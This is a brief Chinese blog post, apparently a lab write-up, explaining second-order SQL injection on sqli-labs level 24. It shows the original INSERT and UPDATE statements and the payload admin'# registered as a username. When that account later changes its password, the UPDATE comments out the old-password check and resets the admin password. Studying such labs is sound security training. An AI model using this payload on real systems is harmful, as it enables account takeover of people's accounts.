SQL二次注入

靶场:sqli-labs第二十四关

先注册一个账号
Mysql原始注册语句: insert into users ( username, password) values("test", "123456")

修改账号密码,把之前123456修改123
Mysql原始注册语句: UPDATE users SET PASSWORD='123' where username='test' and password='123456'

payload:admin'#

把payload插入到用户名最后得出 UPDATE users SET PASSWORD='123' where username='admin'#' and password='123456'

已修改admin账号密码

posted on 2024-12-25 17:46  Ad1ey  阅读(4)  评论(0编辑  收藏  举报

Powered by: 博客园 Copyright © 2025 Ad1ey
Powered by .NET 9.0 on Kubernetes